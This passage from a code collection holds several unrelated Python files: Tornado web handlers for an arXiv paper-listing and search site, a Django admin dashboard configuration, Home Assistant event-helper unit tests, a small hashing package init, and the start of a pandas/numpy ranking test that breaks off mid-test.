"You've been redirected to the Astro-Coffee archive."
"<a href=\"#\" class=\"close\">×</a></div>"
) % listingdate
(archive_dates, archive_npapers,
archive_nlocal, archive_nvoted) = arxivdb.get_archive_index(
database=self.database
)
paper_archives = group_arxiv_dates(archive_dates,
archive_npapers,
archive_nlocal,
archive_nvoted)
self.render("archive.html",
user_name=user_name,
flash_message=flash_message,
new_user=new_user,
paper_archives=paper_archives,
local_today=local_today)
else:
# figure out the UTC date for this archive listing
archive_datestr = datetime(
hour=0,
minute=15,
second=0,
day=int(day),
month=int(month),
year=int(year),
tzinfo=utc
).strftime('%A, %b %d %Y')
# preprocess the local papers to highlight local author names
if len(local_articles) > 0:
for lind in range(len(local_articles)):
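                            # each article row keeps its author string at
                            # index 4 and a comma-separated string of
                            # local-author positions at index -2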
author_list = local_articles[lind][4]
author_list = author_list.split(': ')[-1].split(',')
local_indices = local_articles[lind][-2]
if local_indices and len(local_indices) > 0:
local_indices = [
int(x) for x in local_indices.split(',')
]
for li in local_indices:
author_list[li] = '<strong>%s</strong>' % (
author_list[li]
)
# update this article's local authors
local_articles[lind][4] = ', '.join(author_list)
# show the listing page
self.render("archivelisting.html",
user_name=user_name,
local_today=local_today,
todays_date=archive_datestr,
local_articles=local_articles,
voted_articles=voted_articles,
other_articles=other_articles,
reserved_articles=reserved_articles,
reserve_interval_days=self.reserve_interval,
flash_message=flash_message,
new_user=new_user)
else:
(archive_dates, archive_npapers,
archive_nlocal, archive_nvoted) = arxivdb.get_archive_index(
database=self.database
)
paper_archives = group_arxiv_dates(archive_dates,
archive_npapers,
archive_nlocal,
archive_nvoted)
self.render("archive.html",
user_name=user_name,
flash_message=flash_message,
new_user=new_user,
paper_archives=paper_archives,
local_today=local_today)
else:
(archive_dates, archive_npapers,
archive_nlocal, archive_nvoted) = arxivdb.get_archive_index(
database=self.database
)
paper_archives = group_arxiv_dates(archive_dates,
archive_npapers,
archive_nlocal,
archive_nvoted)
self.render("archive.html",
user_name=user_name,
flash_message=flash_message,
new_user=new_user,
paper_archives=paper_archives,
local_today=local_today)
class LocalListHandler(tornado.web.RequestHandler):
'''
This handles all requests for /astroph-coffee/local-authors.
'''
def initialize(self, database, admincontact, adminemail):
'''
This sets up the database.
'''
self.database = database
self.admincontact = admincontact
self.adminemail = adminemail
def get(self):
'''
This handles GET requests.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
###############################
# show the local authors page #
###############################
authorlist = webdb.get_local_authors(database=self.database)
if authorlist:
self.render("local-authors.html",
local_today=local_today,
user_name=user_name,
flash_message=flash_message,
new_user=new_user,
authorlist=authorlist,
admincontact=self.admincontact,
adminemail=self.adminemail)
else:
LOGGER.error('could not get the author list!')
message = ("There was a database error "
"trying to look up local authors. "
"Please "
"<a href=\"/astroph-coffee/about\">"
"let us know</a> about this problem!")
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
class FTSHandler(tornado.web.RequestHandler):
'''
This handles all requests for searching.
GET returns a search page.
    POST handles the AJAX search request.
'''
def initialize(self,
database,
voting_start,
voting_end,
debug,
signer,
geofence,
countries,
regions):
'''
Sets up the database.
'''
self.database = database
self.voting_start = voting_start
self.voting_end = voting_end
self.debug = debug
self.signer = signer
self.geofence = geofence[0]
self.ipaddrs = geofence[1]
self.editips = geofence[2]
self.countries = countries
self.regions = regions
def get(self):
'''This handles GET requests for searching.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
#######################
## CONTENT RENDERING ##
#######################
self.render("search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="initial",
search_results=None,
search_result_info='',
search_nmatches=0,
new_user=new_user)
def post(self):
'''This handles POST requests for searching.
        Renders the search.html template with search_page_type = 'results'
        and passes search_results to it from a run of the
        fts.fts4_phrase_query_paginated function.
'''
# handle a redirect with an attached flash message
flash_message = self.get_argument('f', None)
if flash_message:
flashtext = msgdecode(flash_message)
LOGGER.warning('flash message: %s' % flashtext)
flashbox = (
'<div data-alert class="alert-box radius">%s'
'<a href="#" class="close">×</a></div>' %
flashtext
)
flash_message = flashbox
else:
flash_message = ''
local_today = datetime.now(tz=utc).strftime('%Y-%m-%d %H:%M %Z')
# first, get the session token
session_token = self.get_secure_cookie('coffee_session',
max_age_days=30)
ip_address = self.request.remote_ip
if 'User-Agent' in self.request.headers:
client_header = self.request.headers['User-Agent'] or 'none'
else:
client_header = 'none'
user_name = 'anonuser@%s' % ip_address
new_user = True
# check if this session_token corresponds to an existing user
if session_token:
sessioninfo = webdb.session_check(session_token,
database=self.database)
if sessioninfo[0]:
user_name = sessioninfo[2]
LOGGER.info('found session for %s, continuing with it' %
user_name)
new_user = False
elif sessioninfo[-1] != 'database_error':
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
else:
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
error_message=message,
local_today=local_today,
flash_message=flash_message,
new_user=new_user)
else:
if ('crawler' not in client_header.lower() and
'bot' not in client_header.lower()):
LOGGER.warning('unknown user, starting a new session for '
'%s, %s' % (ip_address, client_header))
sessionok, token = webdb.anon_session_initiate(
ip_address,
client_header,
database=self.database
)
if sessionok and token:
self.set_secure_cookie('coffee_session',
token,
httponly=True)
else:
LOGGER.error('could not set session cookie for %s, %s' %
(ip_address, client_header))
self.set_status(500)
message = ("There was a database error "
"trying to look up user credentials.")
LOGGER.error('database error while looking up session for '
'%s, %s' % (ip_address, client_header))
self.render("errorpage.html",
user_name=user_name,
local_today=local_today,
error_message=message,
flash_message=flash_message,
new_user=new_user)
#######################
## CONTENT RENDERING ##
#######################
# get the search query
searchquery = self.get_argument('searchquery',None)
        if not searchquery or len(searchquery) == 0:
            search_result_info = ('Sorry, we couldn\'t understand your '
                                  'search query: <strong>%s</strong>' %
                                  squeeze(xhtml_escape(searchquery or '')))
search_results = None
search_nmatches = 0
self.render("search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="results",
search_results=search_results,
search_nmatches=search_nmatches,
search_result_info=search_result_info,
new_user=new_user)
else:
searchquery = squeeze(xhtml_escape(searchquery))
if len(searchquery) > 0:
try:
# figure out the weights to apply
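                    # each explicit column prefix in the query (e.g. 'title:')
                    # bumps that column's relevance weight by 1.0 over its base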
titleq_count = searchquery.count('title:')
abstractq_count = searchquery.count('abstract:')
authorq_count = searchquery.count('authors:')
author_weight = 1.0 + 1.0*authorq_count
abstract_weight = 3.0 + 1.0*abstractq_count
title_weight = 2.0 + 1.0*titleq_count
                    # turn any &quot; entities (produced by xhtml_escape above)
                    # back into " characters so we can do exact phrase matching
                    searchquery = searchquery.replace('&quot;','"')
ftsdict = fts.fts4_phrase_query_paginated(
searchquery,
['arxiv_id','day_serial','title',
'authors','comments','abstract',
'link','pdf','utcdate',
'nvotes',
'local_authors', 'local_author_indices'],
sortcol='relevance',
pagelimit=500,
database=self.database,
relevance_weights=[title_weight,
abstract_weight,
author_weight],
)
search_results = ftsdict['results']
all_nmatches = ftsdict['nmatches']
LOGGER.info('found %s objects matching %s' % (all_nmatches,
searchquery))
relevance_sticker = (
'<span data-tooltip aria-haspopup="true" '
'class="has-tip" title="Okapi BM25 relevance '
'weights: title = %.1f, '
'abstract = %.1f,'
' authors = %.1f, all others = 1.0">relevant</span>'
) % (title_weight, abstract_weight, author_weight)
if all_nmatches == 0:
search_nmatches = 0
search_result_info = (
'Sorry, <span class="nmatches">0</span> '
'matching items were found for: '
'<strong>%s</strong>' %
searchquery
)
elif all_nmatches == 1:
search_nmatches = 1
search_result_info = (
'Found only <span class="nmatches">1</span> '
'matching item for: '
'<strong>%s</strong>' % searchquery
)
elif 1 < all_nmatches < 501:
search_nmatches = len(ftsdict['results']['arxiv_id'])
search_result_info = (
'Found <span class="nmatches">%s</span> '
'matching items for: '
'<strong>%s</strong>' %
(search_nmatches,
searchquery)
)
else:
search_nmatches = len(ftsdict['results']['arxiv_id'])
search_result_info = (
'Found %s total matching '
'items for: <strong>%s</strong>. '
'Showing only the '
'top <span class="nmatches">%s</span> '
'%s '
'results below' %
(all_nmatches,
searchquery,
search_nmatches,
relevance_sticker))
self.render(
"search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="results",
search_results=search_results,
search_nmatches=search_nmatches,
search_result_info=search_result_info,
new_user=new_user
)
# if the query fails on the backend, return nothing.
except Exception as e:
LOGGER.exception("search backend failed on searchquery: %s"
% searchquery)
search_result_info = ('Sorry, we couldn\'t understand your '
'search query: <strong>%s</strong>' %
searchquery)
search_results = None
search_nmatches = 0
self.render("search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="results",
search_results=search_results,
search_nmatches=search_nmatches,
search_result_info=search_result_info,
new_user=new_user)
# this is if we don't understand the query
else:
search_result_info = ('Sorry, we couldn\'t understand your '
'search query: <strong>%s</strong>.' %
searchquery)
search_results = None
search_nmatches = 0
self.render("search.html",
user_name=user_name,
local_today=local_today,
flash_message=flash_message,
search_page_title="Search the Astro-Coffee archive",
search_page_type="results",
search_results=search_results,
search_nmatches=search_nmatches,
search_result_info=search_result_info,
new_user=new_user)
| waqasbhatti/astroph-coffee | src/coffeehandlers.py | Python | mit | 91,422 |
"""
This file was generated with the customdashboard management command and
contains the class for the main dashboard.
To activate your index dashboard add the following to your settings.py::
GRAPPELLI_INDEX_DASHBOARD = 'version3.dashboard.CustomIndexDashboard'
"""
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from grappelli.dashboard import modules, Dashboard
from grappelli.dashboard.utils import get_admin_site_name
class CustomIndexDashboard(Dashboard):
"""
Custom index dashboard for www.
"""
def init_with_context(self, context):
site_name = get_admin_site_name(context)
# append a group for "Administration" & "Applications"
# self.children.append(modules.Group(
# _('Group: Administration & Applications'),
# column=1,
# collapsible=True,
# children = [
# modules.AppList(
# _('Administration'),
# column=1,
# collapsible=False,
# models=('django.contrib.*',),
# ),
# modules.AppList(
# _('Applications'),
# column=1,
# css_classes=('collapse closed',),
# exclude=('django.contrib.*',),
# )
# ]
# ))
# append an app list module for "Applications"
# self.children.append(modules.AppList(
# _('AppList: Applications'),
# collapsible=True,
# column=1,
# css_classes=('collapse closed',),
# exclude=('django.contrib.*',),
# ))
# append an app list module for "Administration"
# self.children.append(modules.ModelList(
# _('ModelList: Administration'),
# column=1,
# collapsible=False,
# models=('django.contrib.*',),
# ))
# append another link list module for "support".
# self.children.append(modules.LinkList(
# _('Media Management'),
# column=2,
# children=[
# {
# 'title': _('FileBrowser'),
# 'url': '/admin/filebrowser/browse/',
# 'external': False,
# },
# ]
# ))
# append another link list module for "support".
# self.children.append(modules.LinkList(
# _('Support'),
# column=2,
# children=[
# {
# 'title': _('Django Documentation'),
# 'url': 'http://docs.djangoproject.com/',
# 'external': True,
# },
# {
# 'title': _('Grappelli Documentation'),
# 'url': 'http://packages.python.org/django-grappelli/',
# 'external': True,
# },
# {
# 'title': _('Grappelli Google-Code'),
# 'url': 'http://code.google.com/p/django-grappelli/',
# 'external': True,
# },
# ]
# ))
# append a feed module
# self.children.append(modules.Feed(
# _('Latest Django News'),
# column=2,
# feed_url='http://www.djangoproject.com/rss/weblog/',
# limit=5
# ))
# append a recent actions module
# self.children.append(modules.RecentActions(
# _('Recent Actions'),
# limit=5,
# collapsible=False,
# column=3,
# ))
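        # the two live modules on this dashboard: the CMS office-file models in
        # column 1 and a (currently empty) lookup-values list in column 2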
self.children.append(modules.ModelList(
title='Office Files / Parties',
column=1,
models=('bittscmsapp.models.CoreInstruction',
'bittscmsapp.models.CoreParty',)
))
self.children.append(modules.ModelList(
title='Lookup Values',
collapsible=True,
column=2,
models=()
))
| bittssystem/version3 | dashboard.py | Python | mit | 4,121 |
"""Test event helpers."""
# pylint: disable=protected-access,too-many-public-methods
# pylint: disable=too-few-public-methods
import unittest
from datetime import datetime, timedelta
from astral import Astral
from homeassistant.bootstrap import setup_component
import homeassistant.core as ha
from homeassistant.const import MATCH_ALL
from homeassistant.helpers.event import (
track_point_in_utc_time,
track_point_in_time,
track_utc_time_change,
track_time_change,
track_state_change,
track_sunrise,
track_sunset,
)
from homeassistant.components import sun
import homeassistant.util.dt as dt_util
from tests.common import get_test_home_assistant
class TestEventHelpers(unittest.TestCase):
"""Test the Home Assistant event helpers."""
def setUp(self): # pylint: disable=invalid-name
"""Setup things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self): # pylint: disable=invalid-name
"""Stop everything that was started."""
self.hass.stop()
def test_track_point_in_time(self):
"""Test track point in time."""
before_birthday = datetime(1985, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
birthday_paulus = datetime(1986, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
after_birthday = datetime(1987, 7, 9, 12, 0, 0, tzinfo=dt_util.UTC)
runs = []
track_point_in_utc_time(
self.hass, lambda x: runs.append(1), birthday_paulus)
self._send_time_changed(before_birthday)
self.hass.block_till_done()
self.assertEqual(0, len(runs))
self._send_time_changed(birthday_paulus)
self.hass.block_till_done()
self.assertEqual(1, len(runs))
# A point in time tracker will only fire once, this should do nothing
self._send_time_changed(birthday_paulus)
self.hass.block_till_done()
self.assertEqual(1, len(runs))
track_point_in_time(
self.hass, lambda x: runs.append(1), birthday_paulus)
self._send_time_changed(after_birthday)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
unsub = track_point_in_time(
self.hass, lambda x: runs.append(1), birthday_paulus)
unsub()
self._send_time_changed(after_birthday)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
def test_track_time_change(self):
"""Test tracking time change."""
wildcard_runs = []
specific_runs = []
unsub = track_time_change(self.hass, lambda x: wildcard_runs.append(1))
unsub_utc = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), second=[0, 30])
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(1, len(wildcard_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 15))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(2, len(wildcard_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 30))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
self.assertEqual(3, len(wildcard_runs))
unsub()
unsub_utc()
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 30))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
self.assertEqual(3, len(wildcard_runs))
def test_track_state_change(self):
"""Test track_state_change."""
# 2 lists to track how often our callbacks get called
specific_runs = []
wildcard_runs = []
wildercard_runs = []
track_state_change(
self.hass, 'light.Bowl', lambda a, b, c: specific_runs.append(1),
'on', 'off')
track_state_change(
self.hass, 'light.Bowl',
lambda _, old_s, new_s: wildcard_runs.append((old_s, new_s)))
track_state_change(
self.hass, MATCH_ALL,
lambda _, old_s, new_s: wildercard_runs.append((old_s, new_s)))
# Adding state to state machine
self.hass.states.set("light.Bowl", "on")
self.hass.block_till_done()
self.assertEqual(0, len(specific_runs))
self.assertEqual(1, len(wildcard_runs))
self.assertEqual(1, len(wildercard_runs))
self.assertIsNone(wildcard_runs[-1][0])
self.assertIsNotNone(wildcard_runs[-1][1])
# Set same state should not trigger a state change/listener
self.hass.states.set('light.Bowl', 'on')
self.hass.block_till_done()
self.assertEqual(0, len(specific_runs))
self.assertEqual(1, len(wildcard_runs))
self.assertEqual(1, len(wildercard_runs))
# State change off -> on
self.hass.states.set('light.Bowl', 'off')
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(2, len(wildcard_runs))
self.assertEqual(2, len(wildercard_runs))
# State change off -> off
self.hass.states.set('light.Bowl', 'off', {"some_attr": 1})
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(3, len(wildcard_runs))
self.assertEqual(3, len(wildercard_runs))
# State change off -> on
self.hass.states.set('light.Bowl', 'on')
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(4, len(wildcard_runs))
self.assertEqual(4, len(wildercard_runs))
self.hass.states.remove('light.bowl')
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(5, len(wildcard_runs))
self.assertEqual(5, len(wildercard_runs))
self.assertIsNotNone(wildcard_runs[-1][0])
self.assertIsNone(wildcard_runs[-1][1])
self.assertIsNotNone(wildercard_runs[-1][0])
self.assertIsNone(wildercard_runs[-1][1])
# Set state for different entity id
self.hass.states.set('switch.kitchen', 'on')
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self.assertEqual(5, len(wildcard_runs))
self.assertEqual(6, len(wildercard_runs))
def test_track_sunrise(self):
"""Test track the sunrise."""
latitude = 32.87336
longitude = 117.22743
# Setup sun component
self.hass.config.latitude = latitude
self.hass.config.longitude = longitude
setup_component(self.hass, sun.DOMAIN, {
sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
# Get next sunrise/sunset
astral = Astral()
utc_now = dt_util.utcnow()
mod = -1
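        # step forward one day at a time (starting from yesterday) until the
        # computed sunrise is in the future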
while True:
next_rising = (astral.sunrise_utc(utc_now +
timedelta(days=mod), latitude, longitude))
if next_rising > utc_now:
break
mod += 1
# Track sunrise
runs = []
unsub = track_sunrise(self.hass, lambda: runs.append(1))
offset_runs = []
offset = timedelta(minutes=30)
unsub2 = track_sunrise(self.hass, lambda: offset_runs.append(1),
offset)
# run tests
self._send_time_changed(next_rising - offset)
self.hass.block_till_done()
self.assertEqual(0, len(runs))
self.assertEqual(0, len(offset_runs))
self._send_time_changed(next_rising)
self.hass.block_till_done()
self.assertEqual(1, len(runs))
self.assertEqual(0, len(offset_runs))
self._send_time_changed(next_rising + offset)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
self.assertEqual(1, len(offset_runs))
unsub()
unsub2()
self._send_time_changed(next_rising + offset)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
self.assertEqual(1, len(offset_runs))
def test_track_sunset(self):
"""Test track the sunset."""
latitude = 32.87336
longitude = 117.22743
# Setup sun component
self.hass.config.latitude = latitude
self.hass.config.longitude = longitude
setup_component(self.hass, sun.DOMAIN, {
sun.DOMAIN: {sun.CONF_ELEVATION: 0}})
# Get next sunrise/sunset
astral = Astral()
utc_now = dt_util.utcnow()
mod = -1
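        # step forward one day at a time (starting from yesterday) until the
        # computed sunset is in the future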
while True:
next_setting = (astral.sunset_utc(utc_now +
timedelta(days=mod), latitude, longitude))
if next_setting > utc_now:
break
mod += 1
# Track sunset
runs = []
unsub = track_sunset(self.hass, lambda: runs.append(1))
offset_runs = []
offset = timedelta(minutes=30)
unsub2 = track_sunset(self.hass, lambda: offset_runs.append(1), offset)
# Run tests
self._send_time_changed(next_setting - offset)
self.hass.block_till_done()
self.assertEqual(0, len(runs))
self.assertEqual(0, len(offset_runs))
self._send_time_changed(next_setting)
self.hass.block_till_done()
self.assertEqual(1, len(runs))
self.assertEqual(0, len(offset_runs))
self._send_time_changed(next_setting + offset)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
self.assertEqual(1, len(offset_runs))
unsub()
unsub2()
self._send_time_changed(next_setting + offset)
self.hass.block_till_done()
self.assertEqual(2, len(runs))
self.assertEqual(1, len(offset_runs))
def _send_time_changed(self, now):
"""Send a time changed event."""
self.hass.bus.fire(ha.EVENT_TIME_CHANGED, {ha.ATTR_NOW: now})
def test_periodic_task_minute(self):
"""Test periodic tasks per minute."""
specific_runs = []
unsub = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), minute='/5')
self._send_time_changed(datetime(2014, 5, 24, 12, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 3, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 24, 12, 5, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
unsub()
self._send_time_changed(datetime(2014, 5, 24, 12, 5, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
def test_periodic_task_hour(self):
"""Test periodic tasks per hour."""
specific_runs = []
unsub = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), hour='/2')
self._send_time_changed(datetime(2014, 5, 24, 22, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 24, 23, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 24, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 25, 1, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 25, 2, 0, 0))
self.hass.block_till_done()
self.assertEqual(3, len(specific_runs))
unsub()
self._send_time_changed(datetime(2014, 5, 25, 2, 0, 0))
self.hass.block_till_done()
self.assertEqual(3, len(specific_runs))
def test_periodic_task_day(self):
"""Test periodic tasks per day."""
specific_runs = []
unsub = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), day='/2')
self._send_time_changed(datetime(2014, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 3, 12, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2014, 5, 4, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
unsub()
self._send_time_changed(datetime(2014, 5, 4, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
def test_periodic_task_year(self):
"""Test periodic tasks per year."""
specific_runs = []
unsub = track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), year='/2')
self._send_time_changed(datetime(2014, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2015, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(1, len(specific_runs))
self._send_time_changed(datetime(2016, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
unsub()
self._send_time_changed(datetime(2016, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(2, len(specific_runs))
def test_periodic_task_wrong_input(self):
"""Test periodic tasks with wrong input."""
specific_runs = []
track_utc_time_change(
self.hass, lambda x: specific_runs.append(1), year='/two')
self._send_time_changed(datetime(2014, 5, 2, 0, 0, 0))
self.hass.block_till_done()
self.assertEqual(0, len(specific_runs))
| leoc/home-assistant | tests/helpers/test_event.py | Python | mit | 13,995 |
"""
.. moduleauthor:: Chris Dusold <[email protected]>
A module containing general purpose, cross instance hashing.
This module intends to make storage and cache checking stable across instances.
"""
from drivelink.hash._hasher import hash
from drivelink.hash._hasher import frozen_hash
from drivelink.hash._hasher import Deterministic_Hashable
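# A minimal usage sketch. The exact accepted input types are defined in
# drivelink.hash._hasher, so the call below is an assumption rather than
# documented behaviour:
#
#     from drivelink.hash import hash
#     # unlike the builtin hash(), this aims to return the same value for the
#     # same input across separate Python runs
#     digest = hash(("stable", "key", 42))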
| cdusold/DriveLink | drivelink/hash/__init__.py | Python | mit | 357 |
from unittest import TestCase
import pandas as pd
import pandas.util.testing as tm
import numpy as np
import trtools.core.topper as topper
import imp
imp.reload(topper)
arr = np.random.randn(10000)
s = pd.Series(arr)
df = tm.makeDataFrame()
class TestTopper(TestCase):
def __init__(self, *args, **kwargs):
TestCase.__init__(self, *args, **kwargs)
def runTest(self):
pass
def setUp(self):
pass
def test_topn_largest(self):
# get the n largest
bn_res = topper.bn_topn(arr, 10)
assert bn_res[0] == max(arr) # sanity check
pd_res = s.order(ascending=False)[:10]
np.testing.assert_almost_equal(bn_res, pd_res)
# change result to biggest to smallest
bn_res = topper.bn_topn(arr, 10, ascending=True)
assert bn_res[-1] == max(arr) # sanity check
pd_res = s.order(ascending=True)[-10:] # grab from end since we reversed
np.testing.assert_almost_equal(bn_res, pd_res)
def test_topn_big_N(self):
"""
When calling topn where N is greater than the number of non-nan values.
This can happen if you're tracking a Frame of returns where not all series start at the same time.
It's possible that in the begining or end, or anytime for that matter, you might not have enough
values. This screws up the logic.
"""
# test data
arr = np.random.randn(100)
arr[5:] = np.nan # only first four are non-na
s = pd.Series(arr)
# top
